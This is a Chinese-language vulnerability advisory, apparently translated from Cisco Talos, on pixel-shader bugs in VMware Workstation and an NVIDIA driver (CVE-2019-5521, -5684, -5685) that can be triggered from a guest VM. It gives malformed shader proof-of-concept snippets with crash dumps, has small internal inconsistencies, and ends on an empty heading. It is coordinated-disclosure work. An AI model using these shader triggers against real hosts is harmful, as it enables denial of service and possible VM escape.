一、执行摘要
近期,研究人员发现VMware ESXi、Workstation和Fusion存在一个越界写入漏洞,可以使用特制的Shader文件触发。该漏洞可以从VMware Guest虚拟机触发此漏洞,将会影响Vmware宿主机,从而导致主机上的vmware-vmx.exe进程崩溃(拒绝服务),该漏洞编号为CVE-2019-5521。
但是,由于NVIDIA的Windows GPU显示驱动存在额外的安全问题,当宿主机/虚拟机系统使用NVIDIA显卡时,VMware拒绝服务漏洞可能会转换为代码执行漏洞(CVE-2019-5684)并导致虚拟机逃逸。
此外,在NVIDIA Windows GPU显示驱动程序上,发现了两个可能导致任意代码执行的越界写入漏洞(CVE-2019-5685),上述漏洞可以由特定的Shader文件触发。
根据我们的协调披露政策,Cisco Talos与NVIDIA和VMware开展合作,确保这些漏洞得以修复,并为受影响的客户提供更新。
二、VMware Workstation 15 Pixel Shader功能拒绝服务漏洞(CVE-2019-5521)
2.1 摘要
VMware Workstation 15中存在可以利用的拒绝服务漏洞,特制的Pixel Shader将会导致拒绝服务问题。攻击者可以利用特制的Shader文件来触发此漏洞,导致宿主机上的vmware-vmx.exe崩溃。
2.2 测试版本
VMware Workstation 15(15.0.2 build-10952284),使用Windows 10 x64作为Guest虚拟机
2.3 CVSSv3评分
6.5 – CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H
2.4 CWE
CWE-125:越界读取
2.5 漏洞详情
在VMware Guest操作系统中,可以通过提供格式错误的Pixel Shader来触发此漏洞。攻击者可能会从VMware Guest用户模式触发此操作,通过越界读取导致主机上的vmware-vmx.exe进程发生拒绝服务攻击,该过程可能也会导致信息泄露。该攻击也可能通过WEBGL(远程网站)实现。
格式错误的Pixel Shader如下所示:
(VMware调试模式)
2018-12-26T09:31:59.472+01:00| svga| W115: --- input --- 2018-12-26T09:31:59.472+01:00| svga| W115+ ps_4_0 2018-12-26T09:31:59.472+01:00| svga| W115+ DCL_SAMPLER SAMPLER[0], DEFAULT 2018-12-26T09:31:59.472+01:00| svga| W115+ DCL_RESOURCE RESOURCE[0], TEXTURE2D, {FLOAT, FLOAT, FLOAT, FLOAT} 2018-12-26T09:31:59.472+01:00| svga| W115+ DCL_INPUT_PS INPUT[1].xy, LINEAR 2018-12-26T09:31:59.472+01:00| svga| W115+ DCL_OUTPUT OUTPUT[0].xyzw 2018-12-26T09:31:59.472+01:00| svga| W115+ DCL_TEMPS 1 2018-12-26T09:31:59.472+01:00| svga| W115+ SAMPLE TEMP[0].xyzw, INPUT[1].xyxx, RESOURCE[26112].xyzw, SAMPLER[0] 2018-12-26T09:31:59.472+01:00| svga| W115+ MOV OUTPUT[0].xyzw, TEMP[0].xyzw 2018-12-26T09:31:59.472+01:00| svga| W115+ RET 2018-12-26T09:31:59.472+01:00| svga| W115+ 2018-12-26T09:31:59.472+01:00| svga| E105: PANIC: ASSERT bora\mks\hostops\DX11\DX11ShaderTrans.c:3267 2018-12-26T09:31:59.472+01:00| svga| W115: Win32 object usage: GDI 7, USER 24 2018-12-26T09:31:59.472+01:00| svga| I125: CoreDump_CoreDump: faking exception to get context 2018-12-26T09:31:59.473+01:00| svga| I125: CoreDump: Minidump file vmware-vmx-debug.dmp exists. Rotating ...
通过修改Shader指令(Shader字节码),可能会导致vmware-vmx.exe进程的拒绝服务。举例来说,例如将“SAMPLE TEMP[0].xyzw, INPUT[1].xyxx, RESOURCE[0].xyzw, SAMPLER[0]”修改为“SAMPLE TEMP[0].xyzw, INPUT[1].xyxx, RESOURCE[26112].xyzw, SAMPLER[0]”。
正如我们在Shader指令转储中看到的那样,该过程修改了Shader,并且数组索引“RESOURCE”已经更改为26112。这将会导致漏洞的产生,因为在资源的声明中,仅对RESOURCE[0]进行了声明,所以RESOURCE[26112]实际上是无效的。这样会导致读取访问冲突,如下所示。此外,通过更改该数组的索引值,攻击者可以计算出不同的读取地址,并导致越界读取。
(VMware发布模式崩溃转储片段)
0:012> .ecxr rax=00000001fffff000 rbx=00007ff7eb952420 rcx=5de0fa8b8cd20000 rdx=0000000000000000 rsi=000000000ebe67e8 rdi=000000000f75ab20 rip=00007ff7eb95263d rsp=000000000ebe47f0 rbp=000000000ebe48f0 r8=0000000000000000 r9=0000000000000000 r10=00000000fffff800 r11=000000000ebe3710 r12=0000000000000000 r13=000000000ebe6910 r14=0000000000000000 r15=000000000ebe64a0 iopl=0 nv up ei pl nz na po nc cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206 Unable to load image C:\Program Files (x86)\VMware\VMware Workstation\x64\vmware-vmx.exe, Win32 error 0n2 *** WARNING: Unable to verify timestamp for vmware-vmx.exe *** ERROR: Module load completed but symbols could not be loaded for vmware-vmx.exe vmware_vmx+0x35263d: 00007ff7`eb95263d 4c8b1cc7 mov r11,qword ptr [rdi+rax*8] ds:00000010`0f752b20=????????????????
2.6 时间节点
2019年1月14日 向厂商披露漏洞
2019年4月8日 Nvidia和VMware开始进行协调沟通
2019年5月23日 披露截止日期延长
2019年8月2日 厂商发布补丁,公开发布漏洞情况
2.7 致谢
该漏洞由Cisco Talos团队的Piotr Bania发现。
三、NVIDIA NVWGF2UMX_CFG.DLL Shader功能代码执行漏洞(CVE-2019-5684)
3.1 摘要
在NVIDIA NVWGF2UMX_CFG驱动程序的24.21.14.1216和412.16版本中存在可以被利用的不可信指针解除引用漏洞。该漏洞可以从VMware Guest虚拟机触发,并影响VMware宿主机。
3.2 测试版本
NVWGF2UMX_CFG.DLL(24.21.14.1216版本),NVIDIA D3D10驱动412.16版本,NVIDIA Quadro K620 VMware Workstation 15(15.0.2 build-10952284),使用Windows 10 x64作为Guest虚拟机。
3.3 CVSSv3评分
9.0 – CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
3.4 CWE
CWE-822:不受信任的指针解除引用
3.5 漏洞详情
在VMware Guest操作系统中,可以通过提供格式错误的Pixel Shader来触发此漏洞。可以从VMware Guest用户模式触发此攻击,从而导致主机上vmware-vmx.exe进程不受信任的指针解除引用,从而导致潜在的内存损坏风险。该攻击也可能通过WEBGL(远程网站)实现。
格式错误的Pixel Shader如下所示:
(VMware调试模式)
ps_4_1 DCL_INPUT_PS INPUT[1].xy, LINEAR DCL_OUTPUT OUTPUT[0].xy DCL_TEMPS 3 DCL_RESOURCE RESOURCE[5], TEXTURE2DARRAY, {FLOAT, FLOAT, FLOAT, FLOAT} DCL_SAMPLER SAMPLER[5], DEFAULT MOV TEMP[0].xy, INPUT[1].xyxx MOV TEMP[0].z, {0, 0, 0, 0} SAMPLE_AOFFIMMI(-1, 0, 0) TEMP[1].xyzw, TEMP[0].xyzx, RESOURCE[46].xyzw, SAMPLER[5] SAMPLE TEMP[2].xyzw, TEMP[0].xyzx, RESOURCE[46].xyzw, SAMPLER[5] SAMPLE_AOFFIMMI(1, 0, 0) TEMP[0].xyzw, TEMP[0].xyzx, RESOURCE[46].xyzw, SAMPLER[5] ADD TEMP[0].zw, TEMP[1].xxxy, TEMP[2].xxxy ADD TEMP[0].xy, TEMP[0].xyxx, TEMP[0].zwzz MUL OUTPUT[0].xy, TEMP[0].xyxx, {0.333333343, 0.333333343, 0, 0} RET
DCL_RESOURCE指令声明了一个非多样本的Shader输入源,其中第一个操作数是Texture寄存器,其中的N是表示寄存器编号的整数。
通过修改Shader指令(Shader字节码),特别是先前声明的SAMPLE指令操作数(Texture寄存器)RESOURCE[5]到不同的RESOURCE[X](在本例中X=46),可以触发任意内存写入,即不可信指针取消引用。
(VMware发布模式崩溃转储片段)
0:015> .ecxr rax=0000021100000000 rbx=000002110bc25568 rcx=0000000000000000 rdx=00000000ffffffff rsi=00007ffb42380074 rdi=000002110bc38c80 rip=00007ffb41344e80 rsp=00000046008fa610 rbp=0000000000000068 r8=0000000000000000 r9=000002110bc25568 r10=00007ffb4110a2c0 r11=000002110bc371d0 r12=00000210f9f1ac60 r13=00000210f9f1b1e0 r14=000002110bc25568 r15=0000000000000000 iopl=0 nv up ei pl nz na po nc cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206 nvwgf2umx_cfg!OpenAdapter12+0x677290: 00007ffb`41344e80 89486c mov dword ptr [rax+6Ch],ecx ds:00000211`0000006c=????????
栈跟踪:
0:015> kb *** Stack trace for last set context - .thread/.cxr resets it # RetAddr : Args to Child : Call Site 00 00007ffb`410af212 : 00007ffb`41225940 00007ffb`41225940 00007ffb`4238005c 00000211`0bc38cb0 : nvwgf2umx_cfg!OpenAdapter12+0x677290 01 00007ffb`410af2af : 00000211`0bc1a428 00000046`008fb7c0 00000211`0bc1a428 00000211`0bc25568 : nvwgf2umx_cfg!OpenAdapter12+0x3e1622 02 00007ffb`4104f9d2 : 00000211`0bc25568 00000046`008fb7c0 00000211`0bc1a428 00000046`008fb7b8 : nvwgf2umx_cfg!OpenAdapter12+0x3e16bf 03 00007ffb`40faa8f6 : 00000210`fa216140 00000000`00000001 0000020f`70677478 00000000`00000000 : nvwgf2umx_cfg!OpenAdapter12+0x381de2 04 00007ffb`40ed7414 : 00000000`00000001 00000000`00000001 00000210`fa4b1440 00000210`fa4b1070 : nvwgf2umx_cfg!OpenAdapter12+0x2dcd06 05 00007ffb`40edda72 : 00000000`00000000 00000210`fa4b1440 00000000`00000000 a4c7a90a`b7ff407f : nvwgf2umx_cfg!OpenAdapter12+0x209824 06 00007ffb`41a7fd4b : 00000210`fa4b1070 00000000`00000000 00000210`fa4b1440 00000210`f9952f40 : nvwgf2umx_cfg!OpenAdapter12+0x20fe82 07 00007ffb`41a1813a : 00000000`80004005 0000020f`70677460 00000000`80004005 00000210`f9952f40 : nvwgf2umx_cfg!NVAPI_Thunk+0x4019bb 08 00007ffb`40ed4509 : 00000000`00000030 00007ffb`41a17fc0 00000210`fa3d19c0 00000000`00000000 : nvwgf2umx_cfg!NVAPI_Thunk+0x399daa 09 00007ffb`40ce206b : 00000000`00000000 00000046`008fbcd1 00007ffb`4192e190 00000046`008f0000 : nvwgf2umx_cfg!OpenAdapter12+0x206919 0a 00007ffb`40ed562e : 00000210`fa23ae60 00000210`fa23ae80 00000000`00000000 00000000`00000000 : nvwgf2umx_cfg!OpenAdapter12+0x1447b 0b 00007ffb`41a9fc11 : 00000000`00000000 00000210`fa1fd988 00000000`00000000 00000000`00000000 : nvwgf2umx_cfg!OpenAdapter12+0x207a3e 0c 00007ffb`41a9a1b7 : 00000000`00000000 00000000`00000000 00000210`f9952f40 00000000`00000000 : nvwgf2umx_cfg!NVAPI_Thunk+0x421881 0d 00007ffb`48eeb11d : 00000000`00000000 00000210`fa1fd978 00000210`f9949050 00000000`00000000 : nvwgf2umx_cfg!NVAPI_Thunk+0x41be27 0e 00007ffb`48ee4eab : 00000211`0bc0df58 00000210`f9949050 00000210`fa1fd978 00000000`00000000 : d3d11!CPixelShader::CLS::FinalConstruct+0x219 0f 00007ffb`48ee4dc3 : 00000046`008fe170 00007ffb`490c3b10 00000210`fa1fd820 00000000`00000000 : d3d11!CLayeredObjectWithCLS<CPixelShader>::FinalConstruct+0xa3 10 00007ffb`48ef7665 : 00000210`fa1fd870 00000046`008fe170 00000046`008fe1a0 00007ffb`490c3b10 : d3d11!CLayeredObjectWithCLS<CPixelShader>::CreateInstance+0x14b 11 00007ffb`48efcac6 : 00000000`00000000 00000000`00000030 00000000`00000000 00000000`00000030 : d3d11!CDevice::CreateLayeredChild+0x975 12 00007ffb`48efd3c0 : 00000210`fa1fd820 00000211`0bbeb4e8 00007ffb`490c30e8 00000000`00000030 : d3d11!NDXGI::CDevice::CreateLayeredChild+0x266 13 00007ffb`48edca83 : 00000210`f99ec980 00000210`00000009 00000210`f99ed1b8 00007ffb`48edaa43 : d3d11!NOutermost::CDevice::CreateLayeredChild+0x1b0 14 00007ffb`48eda976 : 00000211`0bc0dec0 00000000`0000b000 00000046`008fe599 00000000`00000000 : d3d11!CDevice::CreateAndRecreateLayeredChild<SD3D11LayeredPixelShaderCreationArgs>+0x5f 15 00007ffb`48eda768 : 00000210`f99ed1b8 00000211`0bc0dec0 00000000`000001e8 00000000`00000000 : d3d11!CDevice::CreatePixelShader_Worker+0x202 16 00007ff7`6ac48522 : 00000210`fa5bd090 00007ff7`6a990000 00007ff7`6a990000 0000020f`72000600 : d3d11!CDevice::CreatePixelShader+0x28 17 00007ff7`6ac49e05 : 00000210`fa5bd090 00007ff7`6a990000 00007ff7`6a990000 00000046`008fe630 : vmware_vmx+0x2b8522 18 00007ff7`6ac48c82 : 00000210`fa5c5010 00007ff7`6a990000 00000210`fa5bd090 00000210`fa5bd090 : vmware_vmx+0x2b9e05 19 00007ff7`6ac45171 : 00000000`fffff700 00000210`fa5bd090 00000000`00000004 00000210`fa1f5fa0 : vmware_vmx+0x2b8c82 1a 00007ff7`6ab9ee09 : 00007ff7`6ab9ed40 00000210`fa1f5f90 00000000`000044e8 00007ff7`6ac83960 : vmware_vmx+0x2b5171 1b 00007ff7`6ab32bc2 : 00000000`00000000 00007ff7`6ab9ed40 00000046`008ff840 00000000`000044e8 : vmware_vmx+0x20ee09 1c 00007ff7`6ab30c6f : 00000046`008ff960 00000000`00000000 00000000`00000000 00000000`00000002 : vmware_vmx+0x1a2bc2 1d 00007ff7`6aa86830 : 0000020f`720006e0 0000020f`720006e0 00000000`00000000 00000000`00000008 : vmware_vmx+0x1a0c6f 1e 00007ff7`6afab6d0 : 00007ff7`6aa86710 00000000`00000000 00000000`00000000 00000000`00000000 : vmware_vmx+0xf6830 1f 00007ffb`4cdd7e94 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : vmware_vmx+0x61b6d0 20 00007ffb`4fbfa251 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : kernel32!BaseThreadInitThunk+0x14 21 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21
3.6 时间节点
2019年1月14日 向厂商披露漏洞
2019年4月8日 Nvidia和VMware开始进行协调沟通
2019年5月23日 披露截止日期延长
2019年8月2日 厂商发布补丁,公开发布漏洞情况
3.7 致谢
该漏洞由Cisco Talos团队的Piotr Bania发现。
四、NVIDIA NVWGF2UMX_CFG.DLL Shader功能DCL_INDEXABLETEMP代码执行漏洞(CVE-2019-5685)
4.1 摘要
NVIDIA NVWGF2UMX_CFG驱动程序的25.21.14.2531和425.31版本中存在可以被利用的内存损坏漏洞。攻击者借助特制的Pixel Shader可能会导致越界内存写入。攻击者可以使用特制的Shader文件来触发此漏洞。该漏洞可以从VMware Guest虚拟机触发此漏洞,从而影响VMware主机。
4.2 测试版本
NVWGF2UMX_CFG.DLL(25.21.14.2531版本),NVIDIA D3D10驱动程序(425.31版本),NVIDIA Quadro K620 VMware Workstation 15(15.0.4 build-12990004),使用Windows 10 x64作为Guest虚拟机。
4.3 CVSSv3评分
9.0 – CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
4.4 CWE
CWE-787:越界写入
4.5 漏洞详情
在VMware Guest虚拟机操作系统内部,可以通过向NVIDIA NVWGF2UMX_CFG.DLL驱动程序提供格式错误的Pixel Shader来触发此漏洞。可以从VMware Guest用户模式触发此类攻击,从而导致主机上的vmware-vmx.exe进程内存损坏,或者也可以通过WEBGL(远程网站)实现。
格式错误的Pixel Shader示例如下:
ps_4_0 dcl_constantbuffer cb0[2], immediateIndexed dcl_indexableTemp x1[3], 4 dcl_indexableTemp x2[3], 4 dcl_indexableTemp x3[3], 4 dcl_indexableTemp x4[3], 4 dcl_indexableTemp x5[3], 4 dcl_indexableTemp x6[3], 4 ... mov x1[1].y, l(0.900447,0.900447,0.900447,0.900447) mov x1[1].z, l(-0.434966,-0.434966,-0.434966,-0.434966) mov x1[2].x, l(0,0,0,0) mov x1[2].y, l(0.434966,0.434966,0.434966,0.434966) mov x1[2].z, l(0.900447,0.900447,0.900447,0.900447) mov x2[52278].xyzw, x1[0].xyzz mov x2[1].xyzw, x1[1].xyzz mov x2[2].xyzw, x1[2].xyzz mov x3[0].x, l(0.900447,0.900447,0.900447,0.900447) ...
DCL_INDEXABLETEMP函数声明一个可索引的临时寄存器。在示例中,寄存器数组(x2)中的元素数是3,寄存器数组中的组件数是4。
通过修改MOV X2[X]指令的Shader字节码(特别是将数组的索引更改为大于先前定义的值),可以在NVIDIA的NVWGF2UMX_CFG.DLL驱动程序中触发越界内存写入。该错误是由于不正确的目标内存地址计算(R9寄存器,如下所示),计算在NVWGF2UMX_CFG.DLL驱动程序中进行。
(VMware发布模式崩溃转储片段)
0:015> .ecxr rax=0000000000000000 rbx=0000025a57f0c2e0 rcx=0000000000000000 rdx=0000000000000001 rsi=0000000000000001 rdi=0000000000000000 rip=00007ffdca904540 rsp=000000c723cfb630 rbp=000000c723cfb730 r8=0000000000000000 r9=0000029a5832e6b0 r10=000000000000000f r11=00000000000000a4 r12=0000000000040300 r13=0000000000000001 r14=0000025a580f12a0 r15=0000025a583bd870 iopl=0 nv up ei pl zr na po nc cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 nvwgf2umx_cfg!OpenAdapter12+0x17aea0: 00007ffd`ca904540 410f1101 movups xmmword ptr [r9],xmm0 ds:0000029a`5832e6b0=????????????????????????????????
栈追踪:
0:015> kb *** Stack trace for last set context - .thread/.cxr resets it # RetAddr : Args to Child : Call Site 00 00007ffd`ca79dfb1 : 0000025a`580f12a0 00007ffd`cb315bc0 0000025a`580f12a0 0000025a`5772f0c0 : nvwgf2umx_cfg!OpenAdapter12+0x17aea0 01 00007ffd`ca79e7a8 : 00007ffd`ca7870b0 0000025a`57e076c0 00007ffd`ca7870b0 0000025a`57b12140 : nvwgf2umx_cfg!OpenAdapter12+0x14911 02 00007ffd`ca79f906 : 0000025a`57fe83c8 000000c7`23cfb9d9 00000000`fd0000fd 00007ffd`d936d997 : nvwgf2umx_cfg!OpenAdapter12+0x15108 03 00007ffd`ca99a9d9 : 0000025a`57fe83c8 0000025a`5773d480 000000c7`23cfbce0 00000000`00000110 : nvwgf2umx_cfg!OpenAdapter12+0x16266 04 00007ffd`cb4c0d61 : 0000025a`00000000 00000000`00000cf0 0000025a`57fe83c8 00000000`00000000 : nvwgf2umx_cfg!OpenAdapter12+0x211339 05 00007ffd`cb4baaa7 : 0000025a`57fe83c8 00000000`00000000 0000025a`5770c6a0 00000000`00000000 : nvwgf2umx_cfg!NVAPI_Thunk+0x347461 06 00007ffd`d279b11d : 00000000`00000000 000000c7`23cfc4c0 0000025a`57fe83b8 0000025a`577000b0 : nvwgf2umx_cfg!NVAPI_Thunk+0x3411a7 07 00007ffd`d2794eab : 0000025a`5842cfdc 0000025a`577000b0 0000025a`57fe83b8 00000000`00000000 : d3d11!CPixelShader::CLS::FinalConstruct+0x219 08 00007ffd`d2794dc3 : 000000c7`23cfe030 00007ffd`d2973b10 0000025a`57fe8250 00000000`00000000 : d3d11!CLayeredObjectWithCLS<CPixelShader>::FinalConstruct+0xa3 09 00007ffd`d27a7665 : 0000025a`57fe82b0 000000c7`23cfe030 000000c7`23cfe060 00007ffd`d2973b10 : d3d11!CLayeredObjectWithCLS<CPixelShader>::CreateInstance+0x14b 0a 00007ffd`d27acac6 : 00000000`00000000 00000000`00000030 00000000`00000000 00000000`00000030 : d3d11!CDevice::CreateLayeredChild+0x975 0b 00007ffd`d27ad3c0 : 0000025a`57fe8250 00000258`d12418c8 00007ffd`d29730e8 00000000`00000030 : d3d11!NDXGI::CDevice::CreateLayeredChild+0x266 0c 00007ffd`d278ca83 : 00000258`d10016b0 00000258`00000009 00000258`d1001ee8 00007ffd`d278aa43 : d3d11!NOutermost::CDevice::CreateLayeredChild+0x1b0 0d 00007ffd`d278a976 : 0000025a`5842cf40 00000000`0000b000 000000c7`23cfe459 00000000`00000000 : d3d11!CDevice::CreateAndRecreateLayeredChild<SD3D11LayeredPixelShaderCreationArgs>+0x5f 0e 00007ffd`d278a768 : 00000258`d1001ee8 0000025a`5842cf40 00000000`00000d4c 00000000`00000000 : d3d11!CDevice::CreatePixelShader_Worker+0x202 0f 00007ff7`33968802 : 0000025a`5812c050 00007ff7`336b0000 00007ff7`336b0000 00000258`d05f0600 : d3d11!CDevice::CreatePixelShader+0x28 10 00007ff7`3396a0e5 : 0000025a`5812c050 00007ff7`336b0000 00007ff7`336b0000 00000258`d1001708 : vmware_vmx+0x2b8802 11 00007ff7`33968f62 : 0000025a`58133fd0 00007ff7`336b0000 0000025a`5812c050 0000025a`5812c050 : vmware_vmx+0x2ba0e5 12 00007ff7`33965451 : 00000000`fffe4000 0000025a`5812c050 00000000`00000003 0000025a`584c3f70 : vmware_vmx+0x2b8f62 13 00007ff7`338beec9 : 00007ff7`338bee00 0000025a`584c3f60 00000000`00000028 00007ff7`339a3e50 : vmware_vmx+0x2b5451 14 00007ff7`338529d2 : 00000000`00000040 00007ff7`338bee00 000000c7`23cff700 00000000`00000028 : vmware_vmx+0x20eec9 15 00007ff7`33850a9f : 000000c7`23cff820 00000000`00000040 00000000`00000000 00000000`00000001 : vmware_vmx+0x1a29d2 16 00007ff7`337a65a0 : 00000258`d05f0600 00000258`d05f06e0 00000000`00000001 00000000`00000000 : vmware_vmx+0x1a0a9f 17 00007ff7`33ccc7b0 : 00007ff7`337a6480 00000000`00000000 00000000`00000000 00000000`00000000 : vmware_vmx+0xf65a0 18 00007ffd`d6bc7974 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : vmware_vmx+0x61c7b0 19 00007ffd`d93ca271 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : kernel32!BaseThreadInitThunk+0x14 1a 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21
4.6 时间节点
2019年4月29日 向厂商披露漏洞
2019年8月2日 厂商发布补丁,公开发布漏洞情况
4.7 致谢
该漏洞由Cisco Talos团队的Piotr Bania发现。
五、NVIDIA NVWGF2UMX_CFG.DLL Shader功能DCL_INDEXABLETEMP代码执行漏洞(CVE-2019-5685)
5.1 概述
NVIDIA NVWGF2UMX_CFG驱动程序的25.21.14.2531和425.31版本中存在可以利用的内存损坏漏洞。特制的Pixel Shader可能会导致不受信任的指针取消引用。攻击者可以使用特制的Shader文件来触发此漏洞。该漏洞可以从VMware Guest虚拟机触发此漏洞,从而影响VMware主机。
5.2 测试版本
NVWGF2UMX_CFG.DLL(25.21.14.2531版本),NVIDIA D3D10驱动425.31版本,NVIDIA Quadro K620 VMware Workstation 15(15.0.2 build- 12990004),使用Windows 10 x64作为Guest虚拟机。
5.3 CVSSv3评分
9.0 – CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
5.4 CWE
CWE-822:不受信任的指针解除引用
5.5 漏洞详情
在VMware Guest虚拟机操作系统内部,可以通过向NVIDIA NVWGF2UMX_CFG.DLL驱动程序提供格式错误的Pixel Shader来触发此漏洞。可以从VMware Guest用户模式触发此类攻击,以在宿主机上的vmware-vmx.exe进程上导致不受信任的指针解除引用,导致潜在的内存损坏,或理论上也可以通过WEBGL(远程网站)实现。
格式错误的Pixel Shader示例:
ps_4_0 dcl_constantbuffer cb0[3], immediateIndexed dcl_indexableTemp x1[65], 4 mov r17.xyz, v0.xyzw div r17.w, l(1.000000, 1.000000, 1.000000, 1.000000), v0.xyzw mov r0.xyzw, r17.xyzw mad r0.y, r17.xyzw, cb0[2].xxxx, cb0[2].yyyy mov x1[0].x, l(0,0,0,0) mov x1[1].x, l(1,1,1,1) mov x1[2].x, l(1,1,1,1) mov x1[3].x, l(1,1,1,1) mov x1[4].x, l(0,0,0,0) mov x1[5].x, l(0,0,0,0) mov x1[6].x, l(1,1,1,1) mov x1[7].x, l(0,0,0,0) mov x1[8].x, l(0,0,0,0) mov x1[9].x, l(1,1,1,1) mov x1[10].x, l(0,0,0,0) mov x1[11].x, l(1,1,1,1) mov x1[12].x, l(0,0,0,0) mov x1[13].x, l(0,0,0,0) mov x1[14].x, l(1,1,1,1) mov x1[39385].x, l(0,0,0,0) ...
DCL_INDEXABLETEMP函数声明一个可索引的临时寄存器。在示例中,寄存器数组(x2)中的元素数是65,寄存器数组中的组件数是4。
通过修改MOV X1[X]指令的Shader字节码(特别是将数组的索引更改为大于65),可以在NVIDIA的NVWGF2UMX_CFG.DLL驱动程序中导致不受信任的指针取消引用。
(VMware发布模式崩溃转储片段)
0:015> .ecxr rax=0000000000000000 rbx=0000021fa6627bc0 rcx=0000025fa668a150 rdx=0000000000000002 rsi=0000000000000000 rdi=0000021fa6625600 rip=00007ffdca904d0b rsp=0000001f15efb740 rbp=0000001f15efb840 r8=00007ffdca610000 r9=000000003fea6842 r10=00000000000000e4 r11=0000000000000084 r12=0000000000040300 r13=0000000000000001 r14=0000021fa677d920 r15=0000021fa67e3910 iopl=0 nv up ei pl zr na po nc cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 nvwgf2umx_cfg!OpenAdapter12+0x17b66b: 00007ffd`ca904d0b 488901 mov qword ptr [rcx],rax ds:0000025f`a668a150=????????????????
栈跟踪:
0:015> kb *** Stack trace for last set context - .thread/.cxr resets it # RetAddr : Args to Child : Call Site 00 00007ffd`ca79dfb1 : 0000021f`a677d920 00007ffd`cb315bc0 0000021f`a677d920 0000021f`a5fe98c0 : nvwgf2umx_cfg!OpenAdapter12+0x17b66b 01 00007ffd`ca79e7a8 : 00007ffd`ca7870b0 0000021f`a63ad330 00007ffd`ca7870b0 0000021f`a656ded0 : nvwgf2umx_cfg!OpenAdapter12+0x14911 02 00007ffd`ca79f906 : 0000021f`a62af948 0000001f`15efbae9 00000000`84000185 00007ffd`d936d997 : nvwgf2umx_cfg!OpenAdapter12+0x15108 03 00007ffd`ca99a9d9 : 0000021f`a62af948 0000021f`a5ff7c80 0000001f`15efbdf0 00000000`00000110 : nvwgf2umx_cfg!OpenAdapter12+0x16266 04 00007ffd`cb4c0d61 : 0000021f`00000000 00000000`000013c8 0000021f`a62af948 00000000`00000000 : nvwgf2umx_cfg!OpenAdapter12+0x211339 05 00007ffd`cb4baaa7 : 0000021f`a62af948 00000000`00000000 0000021f`a5e1a260 00000000`00000000 : nvwgf2umx_cfg!NVAPI_Thunk+0x347461 06 00007ffd`d279b11d : 00000000`00000000 0000001f`15efc5d0 0000021f`a62af938 0000021f`a5e0dc70 : nvwgf2umx_cfg!NVAPI_Thunk+0x3411a7 07 00007ffd`d2794eab : 0000021f`a67cf96c 0000021f`a5e0dc70 0000021f`a62af938 00000000`00000000 : d3d11!CPixelShader::CLS::FinalConstruct+0x219 08 00007ffd`d2794dc3 : 0000001f`15efe140 00007ffd`d2973b10 0000021f`a62af7e0 00000000`00000000 : d3d11!CLayeredObjectWithCLS<CPixelShader>::FinalConstruct+0xa3 09 00007ffd`d27a7665 : 0000021f`a62af830 0000001f`15efe140 0000001f`15efe170 00007ffd`d2973b10 : d3d11!CLayeredObjectWithCLS<CPixelShader>::CreateInstance+0x14b 0a 00007ffd`d27acac6 : 00000000`00000000 00000000`00000030 00000000`00000000 00000000`00000030 : d3d11!CDevice::CreateLayeredChild+0x975 0b 00007ffd`d27ad3c0 : 0000021f`a62af7e0 0000021f`a64e3f28 00007ffd`d29730e8 00000000`00000030 : d3d11!NDXGI::CDevice::CreateLayeredChild+0x266 0c 00007ffd`d278ca83 : 0000021f`a5fc65d0 0000021f`00000009 0000021f`a5fc6e08 00007ffd`d278aa43 : d3d11!NOutermost::CDevice::CreateLayeredChild+0x1b0 0d 00007ffd`d278a976 : 0000021f`a67cf8d0 00000000`0000b000 0000001f`15efe569 00000000`00000000 : d3d11!CDevice::CreateAndRecreateLayeredChild<SD3D11LayeredPixelShaderCreationArgs>+0x5f 0e 00007ffd`d278a768 : 0000021f`a5fc6e08 0000021f`a67cf8d0 00000000`00001424 00000000`00000000 : d3d11!CDevice::CreatePixelShader_Worker+0x202 0f 00007ff7`33968802 : 0000021f`a67c5060 00007ff7`336b0000 00007ff7`336b0000 0000021e`203e0600 : d3d11!CDevice::CreatePixelShader+0x28 10 00007ff7`3396a0e5 : 0000021f`a67c5060 00007ff7`336b0000 00007ff7`336b0000 0000021f`a5fc6628 : vmware_vmx+0x2b8802 11 00007ff7`33968f62 : 0000021f`a67ccfe0 00007ff7`336b0000 0000021f`a67c5060 0000021f`a67c5060 : vmware_vmx+0x2ba0e5 12 00007ff7`33965451 : 00000000`fffe4000 0000021f`a67c5060 00000000`00000003 0000021f`a667a4d0 : vmware_vmx+0x2b8f62 13 00007ff7`338beec9 : 00007ff7`338bee00 0000021f`a667a4c0 00000000`00000028 00007ff7`339a3e50 : vmware_vmx+0x2b5451 14 00007ff7`338529d2 : 00000000`00000040 00007ff7`338bee00 0000001f`15eff810 00000000`00000028 : vmware_vmx+0x20eec9 15 00007ff7`33850a9f : 0000001f`15eff930 00000000`00000040 00000000`00000000 00000000`00000001 : vmware_vmx+0x1a29d2 16 00007ff7`337a65a0 : 0000021e`203e0600 0000021e`203e06e0 00000000`00000001 00000000`00000000 : vmware_vmx+0x1a0a9f 17 00007ff7`33ccc7b0 : 00007ff7`337a6480 00000000`00000000 00000000`00000000 00000000`00000000 : vmware_vmx+0xf65a0 18 00007ffd`d6bc7974 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : vmware_vmx+0x61c7b0 19 00007ffd`d93ca271 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : kernel32!BaseThreadInitThunk+0x14 1a 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21
六、测试版本
